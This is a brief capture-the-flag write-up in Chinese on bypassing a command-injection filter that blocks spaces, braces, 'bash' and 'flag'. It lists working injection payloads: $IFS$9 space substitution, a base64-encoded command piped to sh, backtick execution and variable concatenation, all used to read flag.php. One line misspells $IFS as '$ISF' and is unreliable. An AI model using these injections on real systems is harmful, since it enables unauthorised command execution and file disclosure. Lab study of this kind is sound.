禁了空格,并且不能用${IFS},因为{也禁了
;ls发现
flag也被禁了
看index.php的源码
;cat$IFS$9index.php
可以base64编码绕过
;echo$ISF$9Y2F0IGZsYWcucGhw|base64$IFS$9-d|sh
bash被禁了,所以用sh
可以内联执行绕过
;cat$IFS$9`ls`
这个`ls`相当于看index.php和flag.php
可以拼接绕过
;a=ag;b=fl;cat$IFS$9$b$a.php
;a=ag.php;b=fl;cat$IFS$9$b$a
;a=g;cat$IFS$9fla$a.php
但是;a=fl;b=ag;cat$IFS$9$a$b.php不会成功,给a和b赋值时,fl在前,ag在后就会出错
